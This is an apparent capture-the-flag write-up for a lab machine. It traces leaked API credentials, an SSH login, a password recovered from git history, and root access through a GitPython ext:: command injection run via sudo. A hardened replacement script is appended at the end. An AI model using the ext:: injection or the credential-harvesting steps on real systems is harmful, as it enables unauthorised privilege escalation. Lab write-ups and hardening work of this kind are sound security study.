Nmap Scan

Contact us: submissions@tiempoarriba.htb

Used Intruder on different ports, as it was returning the same image.

Port 5000 returned a different image, which was a downloaded file.

static/uploads/f21b2992-e049-4139-aec8-d28f0fd28941

/api/latest/metadata/messages/authors

The description says that it retrieves the welcome message sent to our new authors.

We send the API endpoint in the request and get a new file.

{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}

Username: dev, password: dev080217_devAPI!@

ssh dev@10.10.11.20
dev080217_devAPI!@

user.txt

9802795d234c2c68dd3884b945af60a3

Found this in git.

So I need to check the commit.

1e84a036b2f33c59e2390730699a488c65643d28 b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae 
git show b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae 

prod
080217_Producti0n_2023!@
su prod

sudo -l output

GitPython

pip show gitpython

Name: GitPython
Version: 3.1.29
Summary: GitPython is a python library used to interact with Git repositories

#!/usr/bin/python3

import os
import sys
from git import Repo

os.chdir('/opt/internal_apps/clone_changes')

url_to_clone = sys.argv[1]

r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])

Found using the GitPython vulnerability and ChatGPT.

 sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c /tmp/bad"

root.txt
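
A hardened variant of the clone_prod_change.py script above, as an added example that is not part of the original notes or the target's code: it drops the protocol.ext.allow=always option and rejects ext:: style URLs and option-like arguments before git ever sees them. The allowed schemes and the host git.internal.example are assumptions, and git is called directly instead of through GitPython.

```python
#!/usr/bin/python3
# Added example: hardened variant of clone_prod_change.py (not the original script).
import os
import subprocess
import sys
from urllib.parse import urlsplit

CLONE_DIR = "/opt/internal_apps/clone_changes"  # path taken from the original script
ALLOWED_SCHEMES = {"https", "ssh"}              # assumption: the only transports needed
ALLOWED_HOSTS = {"git.internal.example"}        # assumption: placeholder host allowlist


def validate_clone_url(url: str) -> str:
    """Return url unchanged if it is safe to hand to git, else raise ValueError."""
    if not url or url.startswith("-"):
        raise ValueError("URL must not be empty or look like an option")
    if "::" in url.split("/", 1)[0]:
        # '<helper>::<address>' selects a git remote helper such as ext::
        raise ValueError("remote-helper syntax is not allowed")
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme {parts.scheme!r} is not allowed")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"host {parts.hostname!r} is not allowed")
    return url


def build_clone_command(url: str, dest: str = "new_changes") -> list:
    """Build the argv for git: no shell, ext transport disabled, '--' ends options."""
    return ["git", "-c", "protocol.ext.allow=never",
            "clone", "--", validate_clone_url(url), dest]


def main(argv: list) -> int:
    if len(argv) != 2:
        print("usage: clone_prod_change.py <url>", file=sys.stderr)
        return 2
    try:
        cmd = build_clone_command(argv[1])
    except ValueError as exc:
        print(f"refused: {exc}", file=sys.stderr)
        return 1
    # Allow only the https and ssh transports for this git invocation.
    env = dict(os.environ, GIT_ALLOW_PROTOCOL="https:ssh")
    return subprocess.run(cmd, cwd=CLONE_DIR, env=env).returncode


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```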